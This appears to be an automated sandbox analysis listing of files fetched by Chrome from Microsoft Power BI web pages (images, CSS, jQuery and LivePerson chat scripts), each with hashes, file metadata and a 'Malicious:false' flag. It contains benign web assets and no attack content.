                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................E...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................Mmdat.....*..%..B2....,.M4.A$@....p...,q.F.zq.l.p.U.H...}.%:.H.t.=...Z../.b.@[....:.........'........i.c...OUHH.J.Y...U@\...+...Ka...S..I.7%..*./...Y%...&..vB.#eY6.;.....HoU.....Yc.d&<=..M..82q3'..9....x.~...u...ux.o..;.J.D.j.#x"py.J0k....lA.).L_..i.2 g..._El..8{<....GAx......u....Z...4.bx..[..9.....* 5..j....0).U.mUyy..U..7b..3........4.un.......zvL.`.=./.\3..IZ.$4.a..Y.w..,=.W@.......J.AA.i0..+.F.\C>..`.P..,rzP....;..T..g).i.......4...."4....q..^.r...!@.}...dw*_..e."A.w/....C'...6m..%.|....*2...d.d.F.B.^..^...#.L .RM.tp...5.A.s......h..<J....#.P..DB...T....._...(>@........a..}\.."n..\}...b&.c..S..T(.W$.q...H....G.X.i..[.t...v=.....8PB0..++..;$.X.c.h]-l..ly...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (497)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):38563
                                                                                                                                                              Entropy (8bit):4.984749570609448
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:72C2846D6FEA9943DD679ECE21D70805
                                                                                                                                                              SHA1:E1909FBC705EBE1151A0E6ED0DBC73055BFA8C7B
                                                                                                                                                              SHA-256:EF0810BD339DB472F49EC2F392A437EA95DC3137FDE674EEE6A1BCB4E4349EA3
                                                                                                                                                              SHA-512:15ECB06102DD6C2D1B34523A61D19AB85326446F25B10B1ED9030320B4CD69DBD17121BE492CDB6745AB2572F6F67538125AD5F1A127AAB8EDBA04C5E9B8E1E9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static-assets.fs.liveperson.com/microsoft/lp_ada_enhancements-prod.css
                                                                                                                                                              Preview:/* ADA CSS */.body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {..color: #FFFFFF !important;..border: 1px solid #fff !important;.}..#lpChat .lp_minimized .lp_notification_number {..margin-top: 2px !important;.}...lp-json-pollock-layout.lp-json-pollock-layout-vertical {..border-radius: 15px;.}..#lpChat .lp_csat_rater_star {..color: #fff !important;.}...lp_mobile #lpChat>.lp_maximized, .lp_tablet #lpChat>.lp_maximized {..opacity: 1 !important;..width: 100vw !important;..max-height:none !important;.}...lp_desktop #lpChat > .lp_minimized {..width: 400px !important;.}...lp_desktop #lpChat > .lp_maximized {..height: 600px !important;..width: 400px !important;..max-height: 95%;.}..[data-lp-point="lp_line_state"] {..left: -90px !important;.}...lp_sender {..display: none !important;.}...lp_chat_line_wrapper {..overflow: visible !important;..margin-bottom: 12px !important;..padding: 0px 10px 4px 24px !important;.}..[data-lp-point="headerText"] {..color: #fff !important;.}...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):512
                                                                                                                                                              Entropy (8bit):7.533592341521352
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:75D61088FDC298C0D54E596B18AB439E
                                                                                                                                                              SHA1:7BFE909FC448C90C6D20781E76B4CD144C87878C
                                                                                                                                                              SHA-256:43ADF659C309DE0F98DD676E974AA82377220194E7FBA32A2CD55990AB2D3A94
                                                                                                                                                              SHA-512:9467182ACE25A15E43F5EBAF14CEEB3FA481019836CCE48E422CB8C7EDC6BF65B53D84418B077F4EE1EA2AC459DFB9BA22CD9FF0188E6865C6F3A136F62FE7C8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*....>...B!.r....q--.>W.7...}......f...D.U............W..}.|..M........(...L.A.....]K.GeR..N_w..}&..TN.........WR.kf...%..&k'..f.q.&k'.@...=c..Ki]..m...o.....]`.......7.w......v......v..s..m......9...R8}.p.`UO.@.]...&....?2Y.M))..........o..h9..O......Y].S'..a.t.......D#G....7..G./I...G....>.xX`...]..,?.H9..Q..:.v..m.....v35..d.=.".L9z...n..P...7....'...`........$.._....l..O.O...6..{..8.#[...o.H...._.{........e..1......sCX..Je~r..{.. ..1W....U....>.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):99528
                                                                                                                                                              Entropy (8bit):7.998076564583691
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:736287C4F87CAE720ABC300AC8CFDF21
                                                                                                                                                              SHA1:5D662E545BB06AEC045FC2033A103EB31219E2FD
                                                                                                                                                              SHA-256:44D32055433AEAADDEFB3169EF5B66E14F64F6ADD54EDDE55F5DEF9074143346
                                                                                                                                                              SHA-512:AD3FDD720DA565C539723887BC8D5D5926BBAFDC32DACA6ECDD0DB9322067072481DCD2E620325C5521281AF1C2E2234A8833A97100373D418688A20E7433D4F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_WhyPBI_2.2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%....B2...D$..A.P...E....qE.R...G..k.M^.f>QT{A.!+...^+<.<.;x.U.e9!.c.0Ce..T.G.0.....7......G..!....`...fcy..B'y....K=..#T..^.q..q.l....0;.q..I.Y..|T...QJ..;>.).a..j..cR^C.<..F.H..#.....\..e\P.'..r2.-..W.a..Nr..q....E.N.\"r.j.p...YJ ...CTl....v.c.-.`.*.............u.<....' 5H{...@r....<.-jf.y`H>z...d...9....}T.s..4..I.o..........ZL.Q.,*...`.....!.2jj.*..J....F..........|..R..en.i..Z.l.3=.2..>..U.R.W.......`.. ..Hr..i..[..P.M=.....O.....w.n..T..d{.....@2..\..9Pz.6...WC..u=._.....'O1!/.:.n..A".....{.UB..Tee..h...v..r.........#.9.}......9K{.2.`.....dC.`<.)T....5._KU....+...Q.)Y....{...x...<.I.{S`.kk.....l..3..q....>.feY&..1.-.....Z>.0h.:A..>..p.].(e.;.>....5...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):203
                                                                                                                                                              Entropy (8bit):4.6712092041548265
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                                                                                                              SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                                                                                                              SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                                                                                                              SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                                                                                                              Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):159778
                                                                                                                                                              Entropy (8bit):7.996444274678834
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A88975B40A0D274721701DD8744F3EB0
                                                                                                                                                              SHA1:AA18B5F7684EA0536626F0F6821AFD7B68E9C5A7
                                                                                                                                                              SHA-256:CB02567239900A2692923C9DE866A1BE72606AFE6AAC13A16AE77936F6FEFF3B
                                                                                                                                                              SHA-512:4BFF159844FC5A9E0B94D4F29EFD9784CEC78E525C4CA5ACC12F54C9C4E0C507A4C82F258F81126D62A508562D20663CFD5AAD5E0DE09F49D88C8ECDBD42E251
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.p..WEBPVP8X..............ALPH....._. ..:.........._.....V.d.)....h.........X.ertD.'..;....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s.r....w.9.N>.VP8 .m..p....*....>...B!.F....a,...)..682..k..4.L..~.....]..tx..G..]:an...qoK. ..z...T.o......44..?..W...s........?................~....w................>t|....................?.~.~......K...?..._.?....]......................._.......a.W.....w.....p.....?.F..........._........~....../......./.........?.~U~....p...'.....?.....+.m...o._..................._............O.............._......C..._..........7...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):145495
                                                                                                                                                              Entropy (8bit):7.998117342426
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5F2B82EDD1BB7AAAF6750595B626241A
                                                                                                                                                              SHA1:862BFAF5273DBD2AE530C2761FB36C5802FFB3B4
                                                                                                                                                              SHA-256:0200C315A15B128F5791320C2DDB3C51722310E3C8F089EC5412CD8D7F30E3D9
                                                                                                                                                              SHA-512:ECB26B63E553002053D44D305067B3D584EA64C7A835A5E2376098BFA2B5AAAFFBE7A5B931CC71DB329D66DFDF2B3011BCAE9A25F56E74CD57004145A3C84AC7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/372488-accordion-writedax-queries?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=96&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............7=...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma.................7Emdat.....*..%....B2...D.......;.<T...".x.....A...m..b...:....*@C.z..M:F"e..H....s..4J.1.....z.9[o...4D......o.....z8t..w.2.u..v..hN.>_....6...9_wQ......T.2.Ib......gb.....vCa...\..&.........1,.l...l...z.$..y..9....<..a.p.....?{tX.....P.0...;6. L2<....|..i.....Y.....w9.M..T....Z[.:.kU.5....v.}ly.y.x....mw=q.H..zq.G.Y.\,../.sIaY_..RB....;".e.C.K.6Q...z.s...iy..z.^..)..._...NP.u..-...^..1..@GD<..n..*|M.:.U.d7xp...^Bo/1./D..,i*...s. .h...eg.M.;..K=2..k.mJ<.9..>.....?uq.1.....:F..........n.n.......V)D.).Hw...1jI...!....9V...x..g.aF<.'.a..)..$.EX.!s.S.$CA..GS3.`..kdl....^;l.sl......`..I.../^f..XB.3^=.......]J.=/,.7_>.l..X.[J.k.um`.cF.d.Q,GWP...vt=..... .2......E6..;...:C[..".8..`q....a.]..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):67108
                                                                                                                                                              Entropy (8bit):7.996586986359575
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:DF807A449129A18011DE3C55E026392E
                                                                                                                                                              SHA1:8EBE2F2BA1773FD56775EEAB020C31D09BB7D673
                                                                                                                                                              SHA-256:BF2EEB50877A60890195E6FA028515B848E3B4254415E594AE3C02FF12400450
                                                                                                                                                              SHA-512:AF71C8F1211B609D769629A0E7BE5C0DD0E6FD03365310AC9B8764C82A12D7EEBA4A2438B72699C72D12AD40F60B04F07F5D5273827672BEA1A273786AB1E197
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/372488-accordion-explore-your-data?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%....B2...D$..A.P...G.H.....2..Xv.RS[.7.....~...!.X....1"....^'u.H...mX..7v.<...7.... ..B.k.+......d..1X.w....:+uojQ..f4E...P...Z$NQ0tsz.a...'.#.q.....<r.~..G..vP.0w...O...#..}.0{....#;>A.J.."}...../t........DR......v.i/..Z.:u..1a.....F.*~0O.EBy.....3c.u........'sW..-...jXx....6wO.2....=...=..aK.p]....\:.0 ../..]t..........fy.(....v...;.-.\..)....d.i.T..^YQ...1...s.4*..8..../^%.1....vH..[.n........tJ..<<....:.a.........z(KHG..\..w...&.s.`.w....K..gC?.86..ww.<$I.......X.%j..u6^.9.5M..%.W[.....p..;.P.5.W~.Wj....[.e.gZ........n!.)...u:..[.}G.!K.....U...Ea.`0n.....s..p.n.v{LsxW.....y.b.,...{?..`.b...D.te....t.Ta...V.b8.....e.6.|Ai$.hv.?.C.@...E|.s......|..nu..c..j.2
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):56975
                                                                                                                                                              Entropy (8bit):4.7745064069477285
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:884BD098ECB71645787C430F99C6D7B6
                                                                                                                                                              SHA1:1F8B450E1D71D2F2242D6959A8C0EC50974EE448
                                                                                                                                                              SHA-256:B4530D1B6EE9EAF575D6758D140613A368341C087BF22EF3E9475C477E798733
                                                                                                                                                              SHA-512:CF8DDA718482CF562877EEEB67D1EEB02C06D0B70F2FEA31177B6E9CA6EE1A628693B7249CA361E72955B4811405EDB9B3B651DC323018BFF2C1CCA1F3305C54
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH884bd098ecb71645787c430f99c6d7b6.js
                                                                                                                                                              Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (39335), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):39335
                                                                                                                                                              Entropy (8bit):5.245657338212633
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:058746DEA85C93AE0326F56455CA854F
                                                                                                                                                              SHA1:88C6DFB90BACDEED2592E5E18BFAC899BCE0C901
                                                                                                                                                              SHA-256:DD101610BFDD5074E44F8DB73AE061DFBD46C7B6A7C860171E525088E85B6474
                                                                                                                                                              SHA-512:CA39C20F74FD97222D8FCCCC1D7BE0E52FD250ABCFB4A0851FE0C00F927376119B8B2D5639A30E62609027009561D12791B197AA7B10AE10BD90537DF09CF073
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:!function(){window.liveperson=window.liveperson||{};window.liveperson.uiframework=window.liveperson.uiframework||{};window.liveperson.uiframework.latest=window.liveperson.uiframework.latest||{};(r=window.liveperson.uiframework)["v0.8"]=r["v0.8"]||{};var r=r["v0.8"],o=window.lpTag&&window.lpTag.taglets&&window.lpTag.taglets.lpUtil,g=window.lpTag&&window.lpTag.unifiedWindow&&window.lpTag.unifiedWindow.log;r.LPModel=r.LPModel||function(e,i){(g="object"==typeof i?i:g)&&!0!==i||(g={error:t("ERROR"),warn:t("WARN"),info:t("INFO"),debug:t("DEBUG")});function t(t){return function(e){!0===i&&window.console&&("ERROR"===t&&window.console.error?window.console.error("LPModel#"+t+" : "+e+", "+n()):window.console.log&&window.console.log("---LPModel#"+t+" : "+e+", "+n()))}}function n(){function e(e){return e<10?"0"+e:e}var t=new Date;return e(t.getHours())+":"+e(t.getMinutes())+":"+e(t.getSeconds())+", "+t.toDateString()+", ("+t.getTime()+")"}var l=!(!e||"boolean"!=typeof e.debugging)&&e.debugging,c=ne
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):85314
                                                                                                                                                              Entropy (8bit):7.996571527790515
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:509AD72A1A63D7E195BFE5ECF004F6F2
                                                                                                                                                              SHA1:39A1BF64D250DF24FC9869A69F05B95BFC405E3C
                                                                                                                                                              SHA-256:957B4924E2374656985A19E939DFB3549269D54045DFF76257E8FB64E8DD8AEE
                                                                                                                                                              SHA-512:226E9D4C7AEFAA28ED873EB149BBAF1E2BD92218E9C47D6DFCF5C6AC9C19A42F8404663D5BFB63A1222910D646A47304B1DF3AF31AC2A56C6464D7C48FE251C5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/RW13t3E_tbmnl_en-us?scl=1
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............L(...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........8....pixi............av1C........colrnclx...........ipma.................L0mdat.....*..7....B2...D......AcRMe9.q&...`..2.^@,(D.'..z0........S../)(Q%Q..\;....n.L.m...{.D....C#[K.gG'....9.BV...nE.B.....v0.r....="ve.{D$Hq{..|9.M.s.......&...h.7.M.t.9..H..VN..../.K....#'....@..R.1%.....rq..\["2$= H...."...s...@?&.sZ...M%.LSf0P.B...N..u.B`'m...........D...8m._......2A......f.v.7..,..+.w...C....;`7v.!.:.L."}..t>O..mE.....'.G.v{J.|.%.....R#.Q.lE.5....."...X.... =).n.v.kU...!...i.z....)a&..c..L...t.Y[*.G...zg..*#.....Hr..Bz...6#.....D.Xu.D..AYqY/X)..u...0.8...t+{JQ&.(#)io.K..V......m.q....l..=H..\R..`..qa......;........j.;.\,..r.++.#.r...;(.._...7..U_..@.]~0.3.i.S..8..Hu.....]A.-...:b..0AO8..HR.O..2.kpV...+..`..h}w.%.Wx........`.a..J...l[f.&+q......+4..r..w.P..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (889)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):92962
                                                                                                                                                              Entropy (8bit):5.482012211093105
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                                              SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                                              SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                                              SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                                                                                                              Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3708
                                                                                                                                                              Entropy (8bit):7.948093833909796
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F1268BE988FAC234083E80A1FEA12D93
                                                                                                                                                              SHA1:9F7C9AE8F5C3541648A5D83F55776131D7D09A66
                                                                                                                                                              SHA-256:2DE2618A29D67A1FFBAFB2FB72FD6DA36F2ED860895D94B9C6E1F9EDE09863A6
                                                                                                                                                              SHA-512:71DEB6149A4B571DA55F6EC74775EF8B01E9497E71DA7AC5A14A27A669543DB3EDB8ACE388CF3FC59B13DDA8EDB3C93B856B7715D840A70ABD85FD3CF74B04D5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFFt...WEBPVP8 h....1...*.......%..W......F.C.W...7....m.... H.|.._.?..o?.k.~....?...?...y.........w.......o..`.....H.^.....'.7.5.?../..._..._..G...D.............$.F.....O.W..................%........X.f.1...mnF......>..-u5..{..a6.....?]Q-.....b...lMVp>..9}..P`v.9.:#.lS.........x..R.....tE...e........mr.@1DW...*....C.LX..b.8<(../..v/..Xif....TP.t.u... $...[.....9...Qp..QV.y|J........y..}...../......+..............@LT.....=.,[6.......4...7..w}Os.%.$...#.i......./S*.x..q;..}B...T.....hS]}-.....(i.....h./K.......$...$u....nbZ.P.....y....M.;Yb....D8d.p..r.@......F..@k""&C...:R...R8L..,..F.r.4..)....=IP.F....@..|.8.Z$.IN.9.."O.z><..vD...UX~R.g.@...........8r.o..E.R.d....x...:!.:...#EK....2b.5.B...&.).dXZi`..l....l%..:....E.9aU.......l.X.(.H]F.....d.t<...N.....!...7]R):...7........=...g.c.4.......w....-R.6..Wf.9....o.z.x..F..|.8.@ ..s|.z ............?.u.8.. !.b..e..I...c...kp.L..+.,....X.4...'..X.)......P.........UU+....#...L.....P..*.d..^......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (801), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):801
                                                                                                                                                              Entropy (8bit):4.50854671692625
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:4E113C5F4CE115EFB885FDD71CC113F1
                                                                                                                                                              SHA1:714906E2FB3688860E61C6768006D67B4AE56C81
                                                                                                                                                              SHA-256:218B5696A807EB08FC3A4183D8294BFFD0B3543EDC0C3140B76AA8E21B7EB51A
                                                                                                                                                              SHA-512:FE1CF2C6C493ADEC04147F7C0CCE6AD46611F93570C94354D85084FF673F96A1C6559055581FAD646D7F6BF0974029CA38E2FE0EE9645399D114510DE9C8DDC1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/domainprotection/refererrestrictions?cb=lpCb85561x87846
                                                                                                                                                              Preview:lpCb85561x87846([{"enabled":true,"whiteList":["microsoft.com","*.microsoft.com","microsoftstore.com.cn","*.microsoftstore.com.cn","office.com","*.office.com","googleusercontent.com","bingplaces.com","translatoruser-int.com","liveperson.com","*.liveperson.com","liveperson.net","*.liveperson.net","lprnd.net","*.lprnd.net","lpsnmedia.net","*.lpsnmedia.net","static-assets.dev.fs.liveperson.com","*.azure.com","signup.azure.com","azure.com","*.moscnuat.com","*.lpnet.com","*.azurewebsites.net","*.geologic.al","*.microsoft365.com","microsoft365.com","checkout.microsoft365.com","stores.office.com","*.googleusercontent.com","*.bingplaces.com","*.translatoruser-int.com","lpnet.com","moscnuat.com","azurewebsites.net","geologic.al","*.checkout.microsoft365.com","*.stores.office.com"],"deleted":false}]);
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):3149
                                                                                                                                                              Entropy (8bit):7.721226360902602
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C1284846593C076141440BF752E6C8F2
                                                                                                                                                              SHA1:6FEFAF013B70C5A8F7DB8D916939BBB7037B8F29
                                                                                                                                                              SHA-256:329CFB21CCF0C0BEEEA2B97A5FC72360325D1E87DF0DBAB33DD97D143472D78A
                                                                                                                                                              SHA-512:2E4295FC21E93AF0A4D49053EB0FB0DFC14D00C9416A2717557307B40948F891C93163192FC14C2232470FFB140AAF03821FDD37B30DDCA691E853073DB88966
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Analysts_PBI?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=99&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......u...(....pixi............av1C........colrnclx...........ispe.......u...(....pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat....."..v.2......@..>45...8.X.........~......<&.U....>.>.#.f...v!...a...t2!./R.;y.V#...IT.9G.....rpF.UW......._>a*..}.o.h./....9!S+.t..m&k.Ji.%.T..j6.qh#IY.o.XL.....4U...h}.)5.a....r=.#.T.D...0.q.{d.9......._.Q..Z'....."..v..h4 2..........1<.7..............b(....c...eh.R,h...Q.%8.5.SO.`T.D,.V...j."...515...Q........7..*Z.T...=.{T.....A.v.9!..e..\.|.?.K....-.e_W....Yw......l.}..%(aoO..$.lJ....x....h.1....nOi....[G|.b..j.B..>.@..c...l......E.........Fhn:.x:.. .jAl..0...3&.~o.,7-w.....T...N.}..N........zH.......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):49588
                                                                                                                                                              Entropy (8bit):7.994545562310686
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:339F759CA66E5B036886144FB078BF78
                                                                                                                                                              SHA1:C7CE79EB931689425A531FD4841DAD947932E730
                                                                                                                                                              SHA-256:C610178B3700A8CFC604C1CCCF4B6BCF3FB4538A7DB37FED31301D6C5E3E145A
                                                                                                                                                              SHA-512:3319531E0B0646139FEEDCB8C37BC7C94128927828327F5DA55AE88487C363BF9857A8C29D226C3DA3DD9D62B7DE431017F89B62C3ABA3B36865182B12454346
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBICapabilities_1.2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=97&fit=constrain"
